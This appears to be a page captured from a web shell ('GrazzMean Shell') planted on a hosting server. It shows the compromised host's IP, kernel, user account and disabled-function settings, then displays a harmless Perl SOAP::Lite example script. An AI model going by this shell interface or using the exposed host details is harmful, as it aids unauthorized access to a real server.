shell bypass 403

GrazzMean Shell

: /usr/share/doc/perl-SOAP-Lite/examples/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.22.41.143
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : oo-apache.pl
#!perl -w
#!d:\perl\bin\perl.exe

# -- SOAP::Lite -- soaplite.com -- Copyright (C) 2001 Paul Kulchenko --

# ---------------------------------------------------------------------
# Object interaction
# connect to service that described by Graham Glass:
# http://www-106.ibm.com/developerworks/library/ws-peer3/?dwzone=ws
# ---------------------------------------------------------------------

use SOAP::Lite;

my $invoice = bless {name => 'My invoice', amount => 41} => 'Invoice';

my $soap = SOAP::Lite
  -> proxy('http://localhost:8080/soap/servlet/rpcrouter')
  -> maptype({Invoice => 'urn:my_encoding'})
  -> uri('urn:demo2:purchasing');

$a = $soap->receive($invoice)->result;
print 'type: ', ref $a, "\n";
print '  name: ', $a->{name}, "\n";
print '  amount: ', $a->{amount}, "\n";
© 2025 GrazzMean